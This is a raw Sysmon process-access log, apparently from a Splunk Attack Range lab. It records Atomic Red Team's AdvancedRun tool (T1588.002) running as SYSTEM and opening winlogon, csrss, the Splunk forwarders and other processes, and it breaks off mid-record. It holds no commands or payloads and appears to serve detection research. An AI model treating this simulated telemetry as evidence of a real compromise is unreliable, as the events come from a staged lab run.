17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1